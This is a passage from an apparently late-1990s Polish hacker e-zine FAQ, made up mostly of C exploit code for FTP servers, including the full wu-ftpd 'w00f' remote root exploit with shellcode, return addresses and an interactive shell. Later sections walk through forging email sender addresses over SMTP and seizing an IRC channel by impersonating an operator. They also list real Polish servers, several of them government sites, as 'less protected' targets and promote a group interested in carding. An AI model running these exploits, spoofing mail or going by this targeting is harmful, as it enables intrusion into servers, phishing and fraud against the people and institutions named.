                printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]);
                exit(0);
        }

        for(i=0; i < argc; i++) {
          fakeargv[i] = (char *)malloc(strlen(argv[i]) + 1);
          strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1);
        }

        fakeargv[argc] = NULL;

        while((arg = getopt(argc,fakeargv,"l:p:a:o:")) != EOF){
            switch(arg) {
                  case 'l':
                     strncpy(name,optarg,128);
                     break;
                  case 'p':
                     strncpy(pass,optarg,128);
                     break;
                  case 'a':
                     align=atoi(optarg);
                     break;
                  case 'o':
                     offset=atoi(optarg);
                     break;
                  default:
                     printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]);
                     exit(0);
                     break;
             }
        }

        if(name[0] == 0) strcpy(name, "anonymous");
        if(pass[0] == 0) strcpy(pass, "hi@blahblah.net");

        bzero(&cli, sizeof(cli));
        bzero(recvln, sizeof(recvln));
        bzero(sendln, sizeof(sendln));
        cli.sin_family = AF_INET;
        cli.sin_port = htons(21);
        cli.sin_addr.s_addr=getip(argv[1]);

        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                perror("socket");
                exit(0);
        }

        if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
                perror("connect");
                exit(0);
        }
        while((len = read(sockfd, recvln, sizeof(recvln))) > 0){
                recvln[len] = '\0';
                if(strchr(recvln, '\n') != NULL)
                        break;
        }
        logintoftp(sockfd);
        printf("logged in.\n");
        bzero(sendln, sizeof(sendln));

        for(i=align; i<996; i+=4)
                *(long *)&buf2[i] = RET + offset;
        memcpy(buf2, "a", align);
        memset(buf1, 0x90, 800);
        memcpy(buf1, argv[2], strlen(argv[2]));
        mkd(argv[2]);
        p = &buf1[strlen(argv[2])];
        q = &buf1[799];
        *q = '\x0';
        while(p <= q){
                strncpy(tmp, p, 200);
                mkd(tmp);
                p+=200;
        }
        mkd(shellcode);
        mkd("bin");
        mkd("sh");
        p = &buf2[0];
        q = &buf2[999];
        while(p <= q){
                strncpy(tmp, p, 250);
                mkd(tmp);
                p+=250;
        }
        sh(sockfd);

        close(sockfd);
        printf("finit.\n");
}

void mkd(char *dir)
{
        char snd[512], rcv[1024];
        char blah[1024], *p;
        int n;
        struct timeval tv;

        fd_set fds;
        bzero(&tv, sizeof(tv));
        tv.tv_usec=50;
        bzero(blah, sizeof(blah));
        p = blah;
         for(n=0; n<strlen(dir); n++){
                if(dir[n] == '\xff'){
                        *p = '\xff';
                        p++;
                }
                *p = dir[n];
                p++;
        }
        sprintf(snd, "MKD %s\r\n", blah);
        write(sockfd, snd, strlen(snd));
        bzero(snd, sizeof(snd));
        sprintf(snd, "CWD %s\r\n", blah);
        write(sockfd, snd, strlen(snd));
        bzero(rcv, sizeof(rcv));

        FD_ZERO(&fds);
        FD_SET(sockfd,&fds);
        select(sockfd+1,&fds,NULL,NULL,&tv);

        if (FD_ISSET(sockfd,&fds))
                while((n = read(sockfd, rcv, sizeof(rcv))) > 0){
                        rcv[n] = 0;
                        if(strchr(rcv, '\n') != NULL)
                                break;
                }
        return;
}

void logintoftp()
{
        char snd[1024], rcv[1024];
        int n;

        printf("logging in with %s: %s\n", name, pass);
        memset(snd, '\0', 1024);
        sprintf(snd, "USER %s\r\n", name);
        write(sockfd, snd, strlen(snd));

        while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
                rcv[n] = 0;
                if(strchr(rcv, '\n') != NULL)
                        break;
        }

        memset(snd, '\0', 1024);
        sprintf(snd, "PASS %s\r\n", pass);
        write(sockfd, snd, strlen(snd));

        while((n=read(sockfd, rcv, sizeof(rcv))) > 0){
                rcv[n] = 0;
                if(strchr(rcv, '\n') != NULL)
                        break;
        }
        return;
}

void sh()
{
        char snd[1024], rcv[1024];
        fd_set rset;
        int maxfd, n;

        strcpy(snd, "cd /; uname -a; pwd; id;\n");
        write(sockfd, snd, strlen(snd));

        for(;;){
                FD_SET(fileno(stdin), &rset);
                FD_SET(sockfd, &rset);
                maxfd = max(fileno(stdin), sockfd) + 1;
                select(maxfd, &rset, NULL, NULL, NULL);
                if(FD_ISSET(fileno(stdin), &rset)){
                        bzero(snd, sizeof(snd));
                        fgets(snd, sizeof(snd)-2, stdin);
                        write(sockfd, snd, strlen(snd));
                }
                if(FD_ISSET(sockfd, &rset)){
                        bzero(rcv, sizeof(rcv));
                        if((n = read(sockfd, rcv, sizeof(rcv))) == 0){
                                printf("EOF.\n");
                                exit(0);
                        }
                        if(n < 0){
                                perror("read");
                                exit(-1);
                        }
                        fputs(rcv, stdout);
                }
        }
}

int max(int x, int y)
{
        if(x > y)
                return(x);
        return(y);
}

long getip(char *name)
{
        struct hostent *hp;
        long ip;

        if ((ip=inet_addr(name))==-1)
        {
                if ((hp=gethostbyname(name))==NULL)
                {
                        fprintf(stderr,"Can't resolve host.\n");
                        exit (1);
                }
                memcpy(&ip, (hp->h_addr), 4);
        }
        return ip;
}
---CUT HERE---


C.    <FTP WAR>
Mozna tez troszke namieszac w systemie ;]

---CUT HERE---
/*
 * Remote/local exploit for wu-ftpd [12] through [18]
 * gcc w00f.c -o w00f -Wall -O2
 *
 * Offsets/padding may need to be changed, depending on remote daemon
 * compilation options. Try offsets -5000 to 5000 in increments of 100.
 *		
 * Note: you need to use -t >0 for -any- version lower than 18.
 * Coded by smiler and cossack
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
 
 
/* In a beta[12-17] shellcode_A overflow, we will not see responses
to our commands. Add option -c (use chroot code) to fix this. */
unsigned char hellcode_a[]=
        "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
        "\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01\x20"
        "\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
        "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd"
        "\x80\xe8\xcf\xff\xff\xff\xff\xff\xff"
        "\x0f\x42\x49\x4e\x0f\x53\x48";
 
unsigned char hellcode_b[]=
	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /* setuid(0) */
	"\xeb\x66\x5e\x89\xf3\x80\xc3\x0f\x39\xf3\x7c\x07\x80"
	"\x2b\x02\xfe\xcb\xeb\xf5\x31\xc0\x88\x46\x01\x88\x46"
	"\x08\x88\x46\x10\x8d\x5e\x07\xb0\x0c\xcd\x80\x8d\x1e"
	"\x31\xc9\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31"
	"\xc0\x8d\x5e\x02\xb0\x0c\xcd\x80\x31\xc0\x88\x46\x03"
	"\x8d\x5e\x02\xb0\x3d\xcd\x80\x89\xf3\x80\xc3\x09\x89"
	"\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c\xb0\x0b\x8d"
	"\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0\xfe\xc0\xcd\x80"
	"\xe8\x95\xff\xff\xff\xff\xff\xff\x43\x43\x30\x30\x31"
	"\x30\x30\x31\x43\x31\x64\x6b\x70\x31\x75\x6a";
 
 
char *Fgets(char *s,int size,FILE *stream);
int ftp_command(char *buf,int success,FILE *out,char *fmt,...);
int double_up(unsigned long blah,char *doh);
int resolv(char *hostname,struct in_addr *addr);
void fatal(char *string);
int usage(char *program);
int tcp_connect(struct in_addr host,unsigned short port);
int parse_pwd(char *in,int *pwdlen);
void RunShell(int thesock);
 
 
 
struct type {
	unsigned long ret_address;
	unsigned char align; /* Use this only to offset \xff's used */
	signed short pad_shift; /* how little/much padding */
	unsigned char overflow_type; /* whether you have to DELE */
	char *name;
};
 
/* ret_pos is the same for all types of overflows, you only have to change
   the padding. This makes it neater, and gives the shellcode plenty of
   room for nops etc
 */
#define RET_POS 190
#define FTPROOT "/home/ftp"
 
 
/* the redhat 5.0 exploit doesn't work at the moment...it must be some
   trite error i am overlooking. (the shellcode exits w/ code 0375) */
struct type types[]={
	{ 0xbffff340, 3, 60, 0,  "BETA-18 (redhat 5.2)", },
        { 0xbfffe30e, 3,-28, 1,  "BETA-16 (redhat 5.1)", },
        { 0xb2ffe356, 3,-28, 1,  "BETA-15 (redhat 5.0)", },
        { 0xbfffebc5, 3,  0, 1,  "BETA-15 (slackware 3.3)", },
        { 0xbffff3b3, 3,  0, 1,  "BETA-15 (slackware 3.4)", },
	{ 0xbffff395, 3,  0, 1,  "BETA-15 (slackware 3.6)", },
        { 0,0,0,0,NULL }
		    };
 
struct options {
	char start_dir[20];
	unsigned char *shellcode;
	unsigned char chroot;
	char username[10];
	char password[10];
	int offset;
	int t;
} opts;
 
/* Bit of a big messy function, but hey, its only an exploit */
 
int main(int argc,char **argv)
{
	char *argv0,ltr;
	char outbuf[1024], inbuf[1024], ret_string[5];
	int pwdlen,ctr,d;
	FILE *cin;
	int fd;
	struct in_addr victim;
 
	argv0 = strdup(argv[0]);
	*opts.username = *opts.password = *opts.start_dir = 0;
	opts.chroot = opts.offset = opts.t = 0;
	opts.shellcode = hellcode_a;
 
	while ((d = getopt(argc,argv,"cs:o:t:"))!= -1){
		switch (d) {
		case 'c':
			opts.shellcode = hellcode_b;
			opts.chroot = 1;
			break;
		case 's':
			strcpy(opts.start_dir,optarg);
			break;
		case 'o':
			opts.offset = atoi(optarg);
			break;
		case 't':
			opts.t = atoi(optarg);
			if ((opts.t < 0)||(opts.t>5)) {
				printf("Dont have that type!\n");
				exit(-1);
			}
		}
	}
 
	argc -= optind;
	argv += optind;
 	
	if (argc < 3)
		usage(argv0);
 
	if (!resolv(argv[0],&victim)) {
		perror("resolving");
		exit(-1);
	}
	strcpy(opts.username,argv[1]);
	strcpy(opts.password,argv[2]);
 
	if ((fd = tcp_connect(victim,21)) < 0) {
		perror("connect");
		exit(-1);
	}
 
	if (!(cin = fdopen(fd,"r"))) {
		printf("Couldn't get stream\n");
		exit(-1);
	}
 
	Fgets(inbuf,sizeof(inbuf),cin);
	printf("%s",inbuf);
 
	if (ftp_command(inbuf,331,cin,"USER %s\n",opts.username)<0)
		fatal("Bad username\n");
	if (ftp_command(inbuf,230,cin,"PASS %s\n",opts.password)<0)
		fatal("Bad password\n");
 
	if (*opts.start_dir)
		if (ftp_command(inbuf,250,cin,"CWD %s\n",opts.start_dir)<0)
			fatal("Couldn't change dir\n");
 
	if (ftp_command(inbuf,257,cin,"PWD\n")<0)
		fatal("PWD\n");				
 
	if (parse_pwd(inbuf,&pwdlen) < 0)
		fatal("PWD\n");
 
	srand(time(NULL));
	printf("Making padding directorys\n");
	for (ctr = 0;ctr < 4;ctr++) {
		ltr = rand()%26 + 65;
		memset(outbuf,ltr,194);
		outbuf[194]=0;
		if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
			fatal("MKD\n");
		if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
			fatal("CWD\n");
	}
 
	/* Make padding directory */
 
	ctr = 124 - (pwdlen - types[opts.t].align);//180
        //ctr = 152 - (pwdlen - types[opts.t].align);
	ctr -= types[opts.t].pad_shift;
	if (ctr < 0) {
		exit(-1);
	}
	memset(outbuf,'A',ctr+1);
	outbuf[ctr] = 0;
        if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
                fatal("MKD\n");
	if (ftp_command(inbuf,250,cin,"CWD %s\n",outbuf)<0)
		fatal("CWD\n");
 	
	memset(outbuf,0x90,195);
	d=0;
	for (ctr = RET_POS-strlen(opts.shellcode);ctr<(RET_POS);ctr++)
		outbuf[ctr] = opts.shellcode[d++];
	double_up(types[opts.t].ret_address-opts.offset,ret_string);
	strcpy(outbuf+RET_POS,ret_string);
	strcpy(outbuf+RET_POS+strlen(ret_string),ret_string);
 
	printf("Press any key to send shellcode...\n");
	getchar();
	if (ftp_command(inbuf,257,cin,"MKD %s\n",outbuf)<0)
		fatal("MKD\n");
	if (types[opts.t].overflow_type == 1)
		if (ftp_command(inbuf,250,cin,"DELE %s\n",outbuf)<0)
			fatal("DELE\n");
        /* HEH. For type 1 style we add a dele command. This overflow
        occurs in delete() in ftpd.c. The cause is realpath() in realpath.c
	not checking bounds correctly, overwriting path[] in delete(). */
 
        RunShell(fd);
	return(1);
}
 
void RunShell(int thesock)
{
	int n;
	char recvbuf[1024];
	fd_set rset;
 
	while (1)
	{
		FD_ZERO(&rset);
		FD_SET(thesock,&rset);
		FD_SET(STDIN_FILENO,&rset);
		select(thesock+1,&rset,NULL,NULL,NULL);
		if (FD_ISSET(thesock,&rset))
		{
			n=read(thesock,recvbuf,1024);
			if (n <= 0)
			{
				printf("Connection closed\n");
				exit(0);
			}
			recvbuf[n]=0;
			printf("%s",recvbuf);
		}
		if (FD_ISSET(STDIN_FILENO,&rset))
		{
			n=read(STDIN_FILENO,recvbuf,1024);
			if (n>0)
			{
				recvbuf[n]=0;
				write(thesock,recvbuf,n);
			}
		}
	}
	return;
}
 
 
int double_up(unsigned long blah, char *doh)
{
	int a;
	unsigned char *ptr,*ptr2;
	bzero(doh,6);
	ptr=doh;
	ptr2=(char *)&blah;
	for (a=0;a<4;a++) {
		*ptr++=*ptr2;
		if (*ptr2==0xff) *ptr++=0xff;
		ptr2++;
	}
	return(1);
}
 
 
int parse_pwd(char *in, int *pwdlen)
{
	char *ptr1,*ptr2;
 
	/* 257 "/" is current directory */
	ptr1 = strchr(in,'\"');
	if (!ptr1) return(-1);
	ptr2 = strchr(ptr1+1,'\"');
	if (!ptr2) return(-1);
	*ptr2 = 0;
	*pwdlen = strlen(ptr1+1);
	/* If its just "/" then it contributes nothing to the RET_POS */
	if (*pwdlen==1) *pwdlen -= 1;
	printf("Home Dir = %s, Len = %d\n",ptr1+1,*pwdlen);
	return(1);
}
 
int tcp_connect(struct in_addr host,unsigned short port)
{
	struct sockaddr_in serv;
	int fd;
 
	fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
	bzero(&serv,sizeof(serv));
	memcpy(&serv.sin_addr,&host,sizeof(struct in_addr));
	serv.sin_port = htons(port);
	serv.sin_family = AF_INET;
	if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) {
		return(-1);
	}
	return(fd);
}
 
 
int ftp_command(char *buf,int success,FILE *out,char *fmt,...)
{
	va_list va;
	char line[1200];
	int val;
 
	va_start(va,fmt);
	vsprintf(line,fmt,va);
	va_end(va);
 
	if (write(fileno(out),line,strlen(line)) < 0)
		return(-1);
 
	bzero(buf,200);
	while(1) {
		Fgets(line,sizeof(line),out);
#ifdef DEBUG
		printf("%s",line);
#endif
		if (*(line+3)!='-') break;
	}
	strncpy(buf,line,200);
	val = atoi(line);
	if (success != val) return(-1);
	return(1);
}
 
void fatal(char *string)
{
	printf("%s",string);
	exit(-1);
}
 
char *Fgets(char *s,int size,FILE *stream)
{
	char *ptr;
 
	ptr = fgets(s,size,stream);
	//if (!ptr)
		//fatal("Disconnected\n");
	return(ptr);
}
 
int resolv(char *hostname,struct in_addr *addr)
{
        struct hostent *res;
 
        if (inet_aton(hostname,addr))
                return(1);
 
        res = gethostbyname(hostname);
        if (res == NULL)
                return(0);
 
        memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
        return(1);
}
 
int usage(char *program)
{
	fprintf(stderr,"Usage: %s <host> <username> <password> [-c] [-s start_dir]\n",program);
	fprintf(stderr,"\t[-o offset] [-t type]\n");	
	fprintf(stderr,"types:\n");
	fprintf(stderr,"0 - %s\n", types[0].name);
	fprintf(stderr,"1 - %s\n", types[1].name);
        fprintf(stderr,"2 - %s\n", types[2].name);
        fprintf(stderr,"3 - %s\n", types[3].name);
        fprintf(stderr,"4 - %s\n", types[4].name);
        fprintf(stderr,"5 - %s\n", types[5].name);
        fprintf(stderr,"\n");
	exit(0);
}
---CUT HERE---

_______________________________________________________________________________________________XIV.  SPRAWY Z MEJLAMI

A.	<WYSYLANIE FAKE MEJLI>

Jest to chyba najprostrza ze znanych nam metod na fake-mail. Znajdziecie tego buga 
prawie we fszystkich fakjusach , a opisuje go dlatego ze 100% dziala i jest prosty
do sklejenia.
obra na czym to polega? Telnetujemy sie na port 25 jakiegos servera , wyglada to jakos tak :
> telnet <jakis.tam.host.pl> 25
  |              |___        |__________
nazwa programu       |                  Port na ktory sie telnetujemy
               jakis tam host

Wyskoczy nam cos w takim stylu :

>> 220 jakis.tam.host.pl ESMTP Sendmail 9.9.9/9.9.8; Wed, 8 April 1999 21:12:34 +0200

Jak da sie pominac 'helo' to pomijamy , a jak nie da rady to piszemy :

> helo haker

250 dom.vr.pl Hello [194.133.131.78], pleased to meet you 

Teraz podajemy mejla od ktorego nasza ofiara ma dostac ta wiadomosc a wyglada to tak :
> mail from:root@dione.ids.pl
250 fejk@adres.pl ... Sender ok 

I jeszcze gdzie wiadomosc ma dotrzec:
> rcpt to:ofiara@domena.pl

250 ofiara@domena.pl Recipient ok ...

Przydalo by sie jeszcze wpisac jakas tresc :
> data

wyskoczy nam:
>> 354 Enter mail, end with "." on a line by itself 

czyli fpisujemy tresc i konczymy go kropka

potem :
>quit
i wiadomosc wyslana.
________________________________________________________________________________________________ 
XV.IRC

A.	<TEJK OVER>
Najprostrzym sposobem na tejkower jest taka prosta metoda ze az skreca z bolu... Co robimy? 
Wchodzimy na jakis lamerski kanal i patrzymy kto ma opa , z kim sie kto qmpluje . 
Czekamy,obserwujemy i wpewnym momecie widzimy ze jakis opik wlasnie wyszedl , 
czekamy z 15 minut i zmieniamy nika 
na taki sam jak mial ten opik co przed chwila opuscil nas . Jak jusz mamy nika to wreszcie 
wchodzimy na ten lame # . I muwisz : "Qrwa znowu bot sie zpierdolil ! Dajcie opa
to ustawie go prawidlowo..." jak jacys delikfenci beda patrzyli na tfuj ip albo na domene
to juz mozna improwizowac np. " Nadaje z  kawiarenki " lub "Jstem u qmpla" . I wreszcie
widzimy ' lame sets o+ mode to haker ' . Potem mass deop , zarzucamy kilka sesji opujemy je,
zaznaczamy duperele typu "Invite only"... Jeszcze mozna sie zabezpieczyc przed kolesiami co beda  probowalc triku ze splitem jak? Na kazdy odlaczony irc serwer od naszej ircsieci po zalorzyc sesji :-)-<-<

B.	<JAK ZDOBYC IP KOLESIA>
Jak koles siedzi na irc to mamy ulatwione zadanie . Piszemy w naszym klijece IRC :

/whois lamer

wyskoczy pewnie cos podobnego do tego :

Whois Reply for lamer
Address: (+lamer@ide.na.lameriade.pl)
IRC Name: Lamerzysty Lamer
Channels: #lamers
Server: lame.irc.pl
End of Whois for lamer

nas interesuje tylko nazwa hosta czyli : ide.na.lameriade.pl

Start->Uruchom->ping ide.na.lameriade.pl

Wyskoczy:
Pinging ide.na.lameriade.pl with 32 bytes of data
Reply from 127.0.0.1 bytes=32 ..........
                |
             Ip Kolesia
________________________________________________________________________________________________ 
XVI.SLOWNICZEK

A tak w ogule to ludzie chyba zapominaja co to jest faq!
Pisza o jakis gownach co nawet nie maja zastosowania w phreaku/hacku. 1/3 czyjegos tam fakjusa jest 
swietna, a reszta? To same gnioty , exploity bez zastosowania , itd...

FAQ           - Freqetly Asked Questions , czyli ludze sa to NAJCZESCIEJ ZADAWANE PYTANIA przez
                zaawansowanych userow iak i lammerow !

EXTENDER      - Dzwonimy na niego i mamy dial-tone , tpsa za to nie placi tylko firma prowadzaca dany
                extender... Czesto jest bezplatny...

PHREAK        - Jest to taki hack na telefonach,linjach telefonicznych , itp... 
                Jest to nasz "sposob na zycie"

TONE DIALER   - w wolnym tlumaczeniu na Polski to "Tonowy Wybieracz" , sluzy do generowania tonow ,
                DTMF warto sie w niego zaopatrzyc.

DIAL TONE     - Takie piiiiiiii jak podniesiemy sluchawke jakiegos (nie zepsutego) telefonu.

LAME          - Koles ktory mysli ze jest dobry w te klocki(a tak nie jest).

L/D           - Long Distance (daleki zasieg-odleglosc)

SILVER BOX    - patrz TONE - DIALER

BBS	      - dawno,dawno temu jak inet jeszcze 'raczkowal' powstaly bbs'y ktore 		                    ulatwialy 
		komunikowanie sie pomiedzy maszynami droga telefoniczna , byly to wielkie sieci
		zawierajace nie male ilosci danych. Chyba najwieksza firma oferujaca uslugi bbs 
		byla to firma CompuServ ,ale z czasem kiedy zwykly smiertelnik mogl
		kozystac z uslug inetu fszystko poszlo sie jebac. Najwytrwalsi zostali?!

TELNET        - Program ulatwiajacy komunikacje miedzy dwoma maszynami popzez internet.

SSH		  - Cos takiego jak telnet tylko przesylane przez niego dane sa szyfrowane.

CHAKER  	  - Patrz -LAME-

Reszte chyba bez problemu zrozumieliscie??? Macie jakies pytania?? 
To walcie mail to me or sth. ??!!

________________________________________________________________________________________________
XVI.MNIEJ CHRONIONE SERWERY

INFO.IPPT.GOV.PL
WWW.ZETOSA.COM.PL
WWW.RADIOMARYJA.PL
WWW.TOP.PL
WWW.SENAT.GOV.PL
WWW.SEJM.GOV.PL
YOGI.IPPT.GOV.PL
WWW.NENCKI.GOV.PL
PULSAR.IF.WROC.PL
WOR.TVP.COM.PL
TAI.TVP.COM.PL
WWW.TPNET.PL
WWW.PULSAR.COM.PL
WWW.RADOM.TOP.PL
WWW.IDC.COM.PL
WWW.MASTERLINK.COM.PL
ALPHA.NET.PL
WWW.TVN.COM.PL
WWW.SUPERMEDIA.PL
CJB.NET
FREE.NET.PL
XOX.PL
UNIA.3LO.LUBLIN.PL
SEC-NAT.MAN.POLBOX.PL
FREE.POLBOX.PL
GHOST.PLOCK.COM
CODE.INNET.PL
INFOSTRADE.COM.PL
ACTYN.PHYS.UNI.TORUN.PL
GARFIELD.RUDYKOT.PL
BUM.BA-S.PL
STARLET.GDYNIA.IDS.PL
KOPERNIK.ARRA.COM.PL
BIBLO.MIKRUS.PW.EDU.PL
PANORAMIX.COM.PL
AKSON.SGH.WAW.PL
AFRODYTA.LO.BOCHNIA.PL
JAN.MAT.UNI.TORUN.PL
WWW.SE.COM.PL
WWW.ASTAVISTA.PL

_______________________________________________________________________________________________
XVIII. HCP TEAM

Co to jest ? Jest to nowy team zrzeszajacy qmatych ludzi... W pierwszym squadzie graja : blaze ,krizzres,coen,z0rbo,raz0r,logadiN,buczer, k0ok,fain,mastah... Glownymi zainteresowaniami naszego teamu jest "zabezpieczanie systemoof operacyjnych (hack) , konserwacja budek telefonicznych (phreak) & bawienie sie w numerki wytloczone na takich smiesznych kartach platniczych (carding) " . Nasza grupa otwarta jest dla wsztkich ludzi ktorzy chca zaistniec na polskiej scienie , HPC ma za zadanie pomodz sie wykazac roznym qmatym osoba - sa ludzie ktozy dzialaja w 'podziemiu' i nie chca sie ujawnic - nasz squad oferuje wam pelna anonimowosc i Spotkania organizujemy na kanale #hpc :0 Jak jestes zainteresowany czlonkostwem - pisz : blaze@z.pl z tematem " Czlonkostwo" - podaj sfoj wiek , imie , nazwisko, xwe , zainteresowania , co zhaczyles , jaka role chcesz pelnic w naszym teamie. Jednak przed wstapieniem do naszego SQUADU przeczytaj uwaznie regulamn - opisane jest tam fszystko czego powinienes przestrzegac .

W nie dlugim czasie planujemy uruchomic jakis maly serwerek HPC Teamu , narazie mamy i486 (AMD K5 133) , herkulesa , dysk 170 Mb , klawiatoore bez polowy przyciskoof , jakies tak kontrolery (prawie fszystkie zwedzone) i dobre checi... Jak widzisz duzo nam nie brakuje , jak chcesz miec konto to musisz cos sie zrzucic , moze byc cos z tego: kasa , domena , dysk (nawet 80 Mb nas rajcuje) , floppy (1,44 bo 5,25 mam nawet 4ry) , VGA/SVGA (mialem dostac VGA 500 kb od wujasa , ale on cos kreci...) , ewentualnie jakis mini-tower , monitor czarnobialy/kolorowy (VGA/SVGA) , RAM - SIMM (nawer 8 Mb!!!!!!!!!!). Najlepiej jak byscie dali HDD , domene , RAM - te trzy rzeczy i umieszcze takiego skladaka na polibudzie (w serwerowni) , z netem nie bedzie tak trudno - znam jednego administratora :D . Sam widzisz nie zadamy tak wiele , a konto bedziesz mial jak w banku (oczywiscie jakies skladki bedzie trzeba ustanowic - bo za umieszczenie maszyny w serwerowni tez sie placi :( Ale OBIECUJE - ze nie bede na tym zarabial ... Jak jestescie zainteresowani piszcie na
blaze@z.pl z tematem : " Orkiestra Wielkiej POMOCY " .

Ktos obiecal nam domene : http://hpc.waw.com.pl Raz0r obiecal floppa Jeszcze ktos chcial nam dac cztery kostki ramu po dwa mega (w plycie mamy tylko trzy sloty wiec beda male problemy) Ale wiecie jak jest OBIECANKI-CACANKI , najpierw niech dadza a potem pogadamy... 
_______________________________________________________________________________________________
XIX.3ND & GREETZ

Mysle ze nie zmarnowales czasu czytajac tego FAQ,nie mam pojecia czy jest dobre,czy przecietne!
Mail 2 me: blazex@free.com.pl

TNX to:

OWCZI     - za oprawe mojego faq ( Q - BASIC )
YOSSA     - za pomoc przy sprawach zwiazanych z softwarem i nie tylko
PINDA     - on wie za co...
P33W3     - za wspanialego box'a
LCAMTUF   - za pare rad...
BARTOWL   - za podsuniecie paru pomyslow & sprawy soft'towe
HRABIA    - Za pomoc w rozpofszechnianiu tego dokumentu w necie/za swietna stronke o phreaku
            http://www.hack.zone.to/hrabia/ - TO JEST KOMERCJA !
#PHREAKPL - swietny kanal , swietni ludzie , swietne pomysly...
XON       - za invite na #phreakpl , no i za wiele innych rzeczy .
ARTI      - tnx za pomoc z softem !
LOOPP     - koles wie co sie dzieje...
ONEST     - pare razy pomugl mi w sprawach unix-o-podobnych

Pozatym:

KRIZZRES,SHAD0W,KAN,RAMBO,NIGHT-DEVIL,LAMCKER,KANEDA,FREAK,THN,YAH + others

SPECIAL FUCKS TO:

VEN0M            - chlopak przegina ,na irc chce mnie spingowac na smierc : cos mu sie 
                   porty pomylily...
MOJEMU SASIADOWI - cos sie za czesto odzywa do moich starych,ale i tak sie nigdy nie dowie ,
                   ze udostepnial nam swoja linje telefoniczna!:hihi
TePeeSa          - sami wiece
NETIA            - qwa skrzynke mi wymienili na jakas "nowa" !
LUKI		 - czek jeko SMS : "Ty PHREAK BUAHAHAHA toz wy ciecie nawet tego nie umiecie 
	  	   pozadnie wykozystac (teraz bedzie najlepshe wiec czytac) LAM                    		   TOTAL/THATS ME
		   ' LAM TOTAL - thats me chlopak sie na koniec podsumawal co ?!? '

KOLEJNOSC - Zamierzona ;]]]
INSPEKTAH BL@Z3

	      ________________________________________________    
	    << blaze@silesianet.pl   < !! >  Blaze the TrueMC >>
	  << Q&C Programmer <-voice.0604223752-> H P C -Member  >>  
	    <<  http://www.hpc.z.pl   <-=WareZ=-> Developer  >>
	   <<------------------------------------------------->>

---------------------------------------------------------------------------------------------
+++ATH0
Disconected...
Transmition incomplete